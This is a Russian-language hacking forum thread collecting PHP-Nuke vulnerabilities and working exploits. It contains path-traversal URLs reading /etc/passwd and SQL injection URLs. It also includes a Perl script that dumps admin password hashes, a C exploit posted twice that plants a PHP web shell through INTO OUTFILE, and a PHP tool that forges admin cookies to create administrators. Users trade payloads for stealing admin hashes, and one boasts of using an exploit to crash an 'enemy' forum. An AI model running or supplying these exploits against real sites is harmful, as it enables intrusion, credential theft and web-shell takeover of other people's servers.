Баги в PHP-Nuke

Winux · 20.10.2005

Обход каталога в PHP-Nuke

Уязвимость позволяет удаленному пользователю просмотреть произвольные файлы на целевой системе.

Уязвимость существует в сценарии 'modules.php' из-за недостаточной обработки входных данных. Удаленный пользователь может послать HTTP GET или POST запрос и просмотреть произвольные файлы на системе. Пример:

Код:

http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00

Некоторые версии PHP-Nuke не содержат всех файлов форума phpbb. Если отсутствует файл 'extension.inc' в каталоге 'modules/Forums/', удаленный пользователь может с помощью специально сформированного URL просмотреть произвольные файлы на системе. Пример:

Код:

http://[target]/[nuke_dir]/modules.php?name=Search&
file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd

:zns2: Производитель

n1†R0x · 27.10.2005

Программа: PHP-Nuke 7.8

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость обнаружена при обработке входных данных в параметре username в модуле Your_Account, в параметре url модуля Downloads и в параметре description модуля Web_links. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Примеры:

http://[target]/[path]/modules.php?name=Downloads
&d_op=Add&url=[SQL]&title=what&description=what

http://[target]/[path]/modules.php?name=Web_Links
& l_op=Add&title=what&description=[SQL]&url=what

URL производителя: www.phpnuke.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

* PHP-Nuke SQL Injection Vulnerabilities

Winux · 27.01.2006

PHP-Nuke <= 7.8 Search Module Remote SQL Injection Exploit

Код:

#!/usr/bin/perl -w
use IO::Socket;

#==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securityreason.com |
# |
# /---------------------------\ |
# | Critical SQL INJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'query' |
# SQL injection vuln in Search module. |
# |
# References: |
# securityreason.com/achievement_securityalert/27 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/
if (@ARGV < 2)
{
print "*---------------------------------------*\n";
print "* SecurityReason *\n";
print "* EXPLOIT for PHPNuke <=7.8 *\n";
print "* Coded by : sp3x Date : 15.11.2005 *\n";
print "*---------------------------------------*\n\n";
print " Usage : \n";
print " PHPNuke-sp3x[1] HOST /[path_phpnuke] \n\n";
print " HOST - Host where is phpnuke example: localhost \n\n";
print " Example :\n\n";
print " PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ \n\n";
exit();
}

$HOST = $ARGV[0];
$phpnuke_path = $ARGV[1];

print "\n";
print "Host : $HOST\n";
print "phpnuke_path : $phpnuke_path\n";
print "\n";
$OK = 0;
$modules = "modules.php";
$query = "name=Search&query=s%')/**/UNION/**/SELECT/**/0,pwd,0,aid,0,0,0,0,0,0/**/FROM/**/nuke_authors/*";
$length = length $query;
$GET = $phpnuke_path . $modules;
print "[*] Connecting at victim host [OK]\n";
$send = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "[*] Connect [FAILED]\n";
print "[*] Connected [OK]\n";
print "[*] Sending exploit [OK]\n\n";
print $send "POST ".$GET." HTTP/1.0\n";
print $send "Host: ".%HOST."\n";
print $send "Referer: http://".%HOST.$phpnuke_path."modules.php?name=Search \r\n";
print $send "User-Agent: Internet Explorer 6.0 [SR]\n";
print $send "Content-Type: application/x-www-form-urlencoded\n";
print $send "Content-Length: ".$length."\n\n";
print $send $query;
print $send "Cookie: lang=english\r\n\r\n";
print $send "Connection: close\n\n";

print "[*] Exploit send [OK]\n";
print "[*] Wait for reply...[OK]\n";
while ($answer = <$send>)
{
if ($answer =~ /=0"><b>([^:]*)<\/b>/ ) {
$OK = 1;
print "[*] Success [OK]\n";
print "[*] USER: $1\n";
}
if ($answer =~ /=\"0">([^:]*)<\/a>/ ) {
$OK = 1;
print "[*] PASSWORD: $1\n";
}
}
if ($OK == 0) { print "[*] Exploit [FAILED]\n"; }

Winux · 18.02.2006

Critical SQL Injection PHPNuke <= 7.8

Код:

*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80 // port of the web server

void begin(void);
void sqlinj(int sock, char *argv[]);

int main(int argc, char *argv[]){

int sock;
struct sockaddr_in addr;
struct hostent *hp=0;

if(argc!=4) {
begin();
}

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}

printf("\n\n[+] Creating socket [OK]\n");

if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}

printf("[+] Resolving %s [OK]\n", argv[1]);

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}


printf("[+] Connecting at %s [OK]\n", argv[1]);

sqlinj(sock, argv);

printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);

shutdown(sock, 2);
close(sock);

return(0);

}

void begin(void){


printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;

}

void sqlinj(int sock, char *argv[]){

FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}

setbuf(go,NULL);

size+=strlen(argv[3]);

fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET
[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");

}

Sd1904 · 21.02.2006

Код|Code
*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80 // port of the web server

void begin(void);
void sqlinj(int sock, char *argv[]);

int main(int argc, char *argv[]){

int sock;
struct sockaddr_in addr;
struct hostent *hp=0;

if(argc!=4) {
begin();
}

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[ - ] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}

printf("\n\n[ + ] Creating socket [OK]\n");

if((hp = gethostbyname(argv[1])) == 0) {
printf("[ - ] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}

printf("[ + ] Resolving %s [OK]\n", argv[1]);

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[ - ] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}

printf("[ + ] Connecting at %s [OK]\n", argv[1]);

sqlinj(sock, argv);

printf("[ + ] Now check the shell\n"
"[ + ] http://%s\n\n",argv[1]);

shutdown(sock, 2);
close(sock);

return(0);

}

void begin(void){

printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;

}

void sqlinj(int sock, char *argv[]){

FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[ - ] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}

setbuf(go,NULL);

size+=strlen(argv[3]);

fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET
[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[ + ] Sending exploit [OK]\n\n");

}

уронил форум врага.
доволен =)

[mod][Ŧ1LAN :] ещё один такой пост минус в рейтинг получишь.[/mod]

RedDevil · 01.05.2006

Слышал, имееться SQL-инъекция на PhpNuke 7.4 такого вида:

http://site.com/modules.php?name=News&file...=0&thold=0&sid=[SQL]

При этом в файле article.php sid не фильтруеться:

Код:

$result = $db->sql_query("select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'");

Как мне составить SQL-запрос, чтобы получить хеши админов?

not null · 01.05.2006

Код:

' UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null from nuke_authors WHERE id=1

Примечания:
среди null'ов где-то должен быть pwd
префикс может быть другим
ай-ди тоже
К тому же, если это блинд-sql-инъекция, то так просто ты инфу не выдернешь.

Ŧ1LAN · 04.05.2006

SQL-инъекция в PHP-Nuke
Описание:
Недостаточная проверка входящих от пользователя данных позволяет удаленному нападющему составить специальный запрос и выполнить произвольные команды в БД.
Эксплоит:

Код:

<?php
/*             PHP-Nuke <=

W       iLd   BoY
W                     iLd    BoY
W     iLd            BoY
W       iLdBo            Y
W   iL             dBoY
W     iLdB     oY
WiL    d    BoY
W   iL    dBo      Y
Wi       LdB        oY
Wi    Ld       BoY
Wi      LdB     oY
W    iLdBo   Y

                           <local-root@linuxmail.org>

|WiLdBoY «local-root@linuxmail.org»|
***www.savsak.com 
**www.biyo.tk 
*www.root-security.org
*/
 echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 
Transitional//EN"><html><head>
      <title>PHP-Nuke <= All Version Administrator SQL Injection Exploit / By WiLdBoY</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859- 
1"><STYLE type=text/css>
      .bginput  { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: 
Verdana,Arial,Helvetica,sans-serif }
      A:link    { COLOR: #000066; TEXT-DECORATION: none }
      A:visited { COLOR: #000066; TEXT-DECORATION: none }
      A:active  { COLOR: #000066; TEXT-DECORATION: none }
      A:hover   { COLOR: #000066; TEXT-DECORATION: none }
      .button   { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: 
Verdana,Arial,Helvetica,sans-serif }
      </STYLE></head><body bgcolor="#000000" text="#00FF00" link="#363636" 
vlink="#363636" alink="#d5ae83">
      <!-- PHP-Nuke <= All Version Administrator SQL Injection Exploit - Original Code 
By WiLdBoY<local-root@linuxmail.org> -->';

 if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email) 
and ($add_aid) and ($add_pwd)){
        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
        echo "<form name='add' method='post' action='http://" . $server . 
"/admin.php'>
       <input type='hidden' name='op' value='AddAuthor'>
       <input type='hidden' name='add_name' value='" . $add_name . "'>
       <input type='hidden' name='add_aid' value='" . $add_aid . "'>
       <input type='hidden' name='add_email' value='" . $add_email . "'>
       <input type='hidden' name='add_url' value='" . $add_url . "'>
       <input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
       <input type='hidden' name='add_radminsuper' value='" . 
$add_radminsuper . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center><font size='1' face='Verdana, Arial, Helvetica, sans- 
serif'>Site
       Name : <strong>http://" . $server . "</strong> .
 
Password : <strong>" .
       $hash . "</strong> . 
News Administrator Name : <strong>" . $add_name 
. "</strong>.
       <a href='javascript:history.back() 
'><strong>«Back»</strong></a>.</font>
       

<font size='1' face='Verdana, Arial, Helvetica, sans- 
serif'><b></b></font></center>
       <center><input name='AddSysop' type='submit' id='AddSysop' 
value='Create Administrator' class='button'></center>
       </form>";
           } elseif (($action == "goNews") and ($server) and ($subject) and 
($hometext) and ($bodytext)){

        $admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
        $server = chop($server); $add_pwd = chop($add_pwd);
        $hash = $admin_name . ":" . $admin_hash . ":";
        $hash = base64_encode($hash);
        echo "<form name='addNews' method='post' action='http://" . $server 
. "/admin.php'>
       <input name='op' type='hidden' id='op' value='PostAdminStory'>
       <input name='topic' type='hidden' id='topic' value='1'>
       <input name='catid' type='hidden' id='catid' value='0'>
       <input name='ihome' type='hidden' id='ihome' value='0'>
       <input type='hidden' name='subject' value='" . $subject . "'>
       <input type='hidden' name='hometext' value='" . $hometext . "'>
       <input type='hidden' name='bodytext' value='" . $bodytext . "'>
       <input type='hidden' name='acomm' value='" . $acomm . "'>
       <input type='hidden' name='automated' value='" . $automated . "'>
       <input type='hidden' name='day' value='" . $day . "'>
       <input type='hidden' name='month' value='" . $month . "'>
       <input type='hidden' name='year' value='" . $year . "'>
       <input type='hidden' name='hour' value='" . $hour . "'>
       <input type='hidden' name='min' value='" . $min . "'>
       <input type='hidden' name='admin' value=" . $hash .">
       <center>
       <font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor 
vulnerable : <strong>http://" . $server . "</strong> . 

        MD5 Password : <strong>" . $hash . "</strong> . 

       Asunto de la Noticia: <strong>" . $subject . "</strong>. 

       La Noticia es: <strong>" . $hometext . "</strong>. 

       En caso de que estos datos no sean correctos vuelva atras desde <a 
href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> 

       

       <font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>By WiLdBoY</b>
</font> 
</center>
       <center>
       <input name='AddSysop' type='submit' id='AddSysop' value='Agregar 
Noticia' class='button'>
       </center>
       </form>";
           } elseif($exploit == "news") {
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <TABLE width="50%" border=0 align="center" cellPadding=0 
cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" 
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
      Vulnerable:</u></font></strong></div></TD>
      </TR>
      <TR> <TD width="39%"> <div align="center"><font size="1" 
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
      Adress:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" 
value="www.">
      </div></TD>
      </TR>
      <TR> <TD> <div align="center"><strong><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">Admin
      Name:</font></strong></div></TD>
      <TD> </TD>
      <TD> <p align="left"> <input name="admin_name" type="text" 
id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR> <TD><div align="center"><strong><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
      <TD> </TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="40" 
class="bginput">
      </p></TD>
      </TR>
      </TABLE>

      <table width="50%" border="0" align="center">
      <tr>
      <td><div align="center"><strong><font color="#003366" size="1" 
face="Verdana, Arial, Helvetica, sans-serif"><u>The 
News:</u></font></strong></div></td>
      </tr>
      <tr> <td><div align="center"><strong><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">
      <input name="action" type="hidden" id="action" value="goNews">
      Title</font></strong><font size="1" face="Verdana, Arial, Helvetica, 
sans-serif">(Obligatory)<strong>:

      <input size=50 name=subject class="bginput">

      </strong></font></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" face="Verdana, Arial, 
Helvetica, sans-serif"><strong>Text of
      the News</strong>(necessary)<strong>:

      <textarea name=hometext rows=5 wrap=virtual cols=50 
class="bginput"></textarea>
      </strong></font></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" face="Verdana, Arial, 
Helvetica, sans-serif"><strong>Extended
      Text</strong>(necessary)<strong>:

      <textarea name=bodytext rows=12 wrap=virtual cols=50 
class="bginput"></textarea>
      </strong></font></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" face="Verdana, Arial, 
Helvetica, sans-serif">Active Commentaries for
      this News?<strong>  
      <input type=radio checked value=0 name=acomm>
      Yes 
      <input type=radio value=1 name=acomm>
      No</strong><strong></strong></font></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" face="Verdana, Arial, 
Helvetica, sans-serif">You want to program
      this history?<strong>  
      <input type=radio value=1 name=automated>
      Yes   
      <input type=radio checked value=0 name=automated>
      No

      

      Day:
      <input name="day" type="text" id="day3" value="' . date(d) . '" 
size="4" class="bginput">
      Month:
      <select name="month" id="select2" class="bginput">
      <option value="1">1</option>
      <option value="2">2</option>
      <option value="3">3</option>
      <option value="4">4</option>
      <option value="5">5</option>
      <option value="6">6</option>
      <option value="7">7</option>
      <option value="8">8</option>
      <option value="9">9</option>
      <option value="10">10</option>
      <option value="11">11</option>
      <option value="12" selected>12</option>
      </select>
      Year:
      <input maxlength=4 size=5 value="' . date(Y) . '" name=year 
class="bginput">
      

      Hour:
      <select name=hour class="bginput">
      <option selected name="hour">00</option>
      <option name="hour">01</option>
      <option name="hour">02</option>
      <option name="hour">03</option>
      <option name="hour">04</option>
      <option name="hour">05</option>
      <option name="hour">06</option>
      <option name="hour">07</option>
      <option name="hour">08</option>
      <option name="hour">09</option>
      <option name="hour">10</option>
      <option name="hour">11</option>
      <option name="hour">12</option>
      <option name="hour">13</option>
      <option name="hour">14</option>
      <option name="hour">15</option>
      <option name="hour">16</option>
      <option name="hour">17</option>
      <option name="hour">18</option>
      <option name="hour">19</option>
      <option name="hour">20</option>
      <option name="hour">21</option>
      <option name="hour">22</option>
      <option name="hour">23</option>
      </select>
      : <select name=min class="bginput">
      <option selected name="min">00</option>
      <option name="min">05</option>
      <option name="min">10</option>
      <option name="min">15</option>
      <option name="min">20</option>
      <option name="min">25</option>
      <option name="min">30</option>
      <option name="min">35</option>
      <option name="min">40</option>
      <option name="min">45</option>
      <option name="min">50</option>
      <option name="min">55</option>
      </select>
      : 00</strong></font></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" face="Verdana, Arial, 
Helvetica, sans-serif"><strong> <input name="submit" type=submit value="Add 
News" class="button">
      </strong></font></div></td>
      </tr>
      </table><center><strong><font color="#000066" size="1" 
face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ View exploit of 
the Administrators ]</a> </font></strong></center>';
                   } else {
 echo'<FORM action="' . $PHP_Self . '" method=post>
      <p align="center"><u><strong><font size="2" face="Verdana, Arial, 
Helvetica, sans-serif">
      <input name="action" type="hidden" id="action" value="goAdmin">
      </font></strong></u></p>
      <div align="center">
      <TABLE width="50%" border=0 align="center" cellPadding=0 
cellSpacing=0>
      <TR><TD colspan="3"><div align="center"><strong><font color="#003366" 
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
      Vulnerable:</u></font></strong></div></TD>
      </TR>
      <TR> <TD width="39%"> <div align="center"><font size="1" 
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
      Adress:</strong></font></div></TD>
      <TD width="13%"><div align="right"><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">http://</font></div></TD>
      <TD width="48%"><div align="left"><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">
      </font>
      <input name="server" type="text" class="bginput" id="server" 
value="www.">
      </div></TD>
      </TR>
      <TR> <TD> <div align="center"><strong><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">Admin
      Name:</font></strong></div></TD>
      <TD> </TD>
      <TD> <p align="left">
      <input name="admin_name" type="text" id="admin_name" class="bginput">
      </p></TD>
      </TR>
      <TR> <TD><div align="center"><strong><font size="1" face="Verdana, 
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
      <TD> </TD>
      <TD> <p align="left">
      <input name="admin_hash" type="text" id="admin_hash" size="40" 
class="bginput">
      </p></TD>
      </TR>
      </TABLE>
      

      </div>
      <TABLE width="50%" border=0 align="center">
      <TBODY>
      <TR> <TD colspan="2"><div align="center"><strong><font 
color="#003366" size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><u>Account
      Data:</u></font></strong></div></TD>
      </TR>
      <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><strong>Name:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
<INPUT maxLength=50 size=30 name=add_name class="bginput">
      (necessary)</font></TD>
      </TR>
      <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><strong>Nickname:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
      (necessary)</font></TD>
      </TR>
      <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><strong>E-Mail:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
<INPUT maxLength=60 size=30 name=add_email class="bginput">
      (necessary)</font></TD>
      </TR>
      <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans- 
serif">URL:</font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
<INPUT name=add_url class="bginput" value="http://www." size=30 
maxLength=60>
      <strong> <input name="add_radminsuper" type="hidden" 
id="add_radminsuper" value="1">
      </strong> </font></TD>
      </TR>
      <TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><strong>Password:</strong></font></TD>
      <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
      (necessary)</font></TD>
      </TR>
      <INPUT type=hidden value=AddAuthor name=op>
      </TABLE>    <div align="center">
      <INPUT name="submit" type=submit value="Create Administrator" 
class="button">
      </div>
      </FORM><center><strong><font color="#000066" size="1" 
face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ View exploit of 
News ]</a> </font></strong></center>';
      } if (($action == "goAdmin") or ($action == "goNews")){
 echo'';

 }if (($action != "goAdmin") and ($action != "goNews")){
 echo'
<table width="100%" border="0" align="center">
      <tr> <td colspan="2"><div align="center"><font color="#003366" 
size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><strong><u>Usage:</u></strong></font></div></td>
      </tr>
      <tr> <td width="15%"><strong><font size="1" 
face="Tahoma">&raquo;Server Adress
      :</font></strong></td>
      <td width="85%"><font size="1" face="Tahoma">Site Name
 Example: 
www.phpnuke.org</font></td>
      </tr>
      <tr> <td><strong><font size="1" face="Tahoma">&raquo;Nombre Admin 
:</font></strong></td>
      <td><font size="1" face="Tahoma">Site Administrator Name
 Example : 
WiLdBoY</font></td>
      </tr>
      <tr> <td><strong><font size="1" face="Tahoma">&raquo;Password MD5 
:</font></strong></td>
      <td><font size="1" face="Tahoma">Administrator MD5 Password
 Example: 1ea52f26e7e0ce08e462f87f5e35096c 
</font></td>
      </tr>
      </table>
<div align="center">
      <table width="45%" border="0" align="center">
      <tr> <td colspan="2"><div align="center"><font color="#003366" 
size="1" face="Verdana, Arial, Helvetica, sans- 
serif"><strong><u>Greetz:</u></strong></font></div></td>
      </tr>
      <tr> <td width="47%"><div align="center"><font size="1" 
face="Tahoma">The-BeKiR :</font></div></td>
      <td width="53%"><div align="center"><font size="1" face="Tahoma"><a 
href="http://savsak.com" 
target="_blank">http://www.savsak.com</a> </font> <font size="1" 
face="Tahoma"></font></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" 
face="Tahoma"><strong>WiLdBoY</strong>
      :</font></div></td>
      <td><div align="center"><strong><font size="1" face="Tahoma"><a 
href="http://www.root-security.org" 
target="_blank"><u>http://www.root-security.org</u></a></font></strong></div></td>
      </tr>
      <tr> <td><div align="center"><font size="1" face="Tahoma">Liz0ziM  :</font></div></td>
      <td><div align="center"><font size="1" face="Tahoma"><a 
href="http://www.biyo.tk" 
target="_blank">http://www.biyo.tk</a></font></div></td>
      </tr>
      <tr> <td>
      <div align="center"><font size="1" face="Tahoma">BJK 
:</font></div></td>
      <td><div align="center"><font size="1" face="Tahoma"><a 
href="http://www.forzabesiktas.com" 
target="_blank">http://www.forzabesiktas.com</a></font></div></td>
      </tr>
      </table>';

 }
       echo'<center><p><a href="mailto:local-root@linuxmail.org"><u><strong><font 
color="#CC0000" size="1" face="Tahoma">Original Exploit Code By 
WiLdBoY.</font></strong></u></a>
<font color="#003366" size="1" 
face="Verdana"><b>Turkish Hacker ( Sifre Kirici )</b></font></p></center>
      </div>
      </body>
      </html>';
?>
<center>
<img src="http://root-security.t35.com/atam.gif" width="152" height="108"></font></p>
<center>
<embed src="http://sarpkayalar.tripod.com/cgi-bin/darbe.mp3" loop=1 autostart=true hidden
width=128 height=128>

not null · 24.10.2006

php-Nuke <= 7.9 Encyclopedia remote SQL injection PoC-exploit

Код:

<?
/*

Neo Security Team - Exploit made by Paisterist on 2006-10-22
http://www.neosecurityteam.net

*/

$host="localhost";
$path="/phpnuke/";
$prefix="nuke_";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1";

if ($fp) {
   $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
   $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n";
   $p.="Referer: http://localhost/phpnuke/modules.
php?name=Encyclopedia&file=search\r\n";
   $p.="Accept-Language: es-ar\r\n";
   $p.="Content-Type: application/x-www-form-urlencoded\r\n";
   $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
   $p.="Host: localhost\r\n";
   $p.="Content-Length: ".strlen($data)."\r\n";
   $p.="Pragma: no-cache\r\n";
   $p.="Connection: keep-alive\r\n\r\n";
   $p.=$data;
  
   fwrite($fp, $p);
  
   while (!feof($fp)) {
       $content .= fread($fp, 4096);
   }

   preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

   print_r($matches);
}
?>

Dr0ne · 25.10.2006

вот вам моя бага, которую я нашел еще в 2005 году, сразу после выхода версии 7,9. она у меня ваялется уже почти год))))

активная XSS

вот бажный кусок кода

Код:

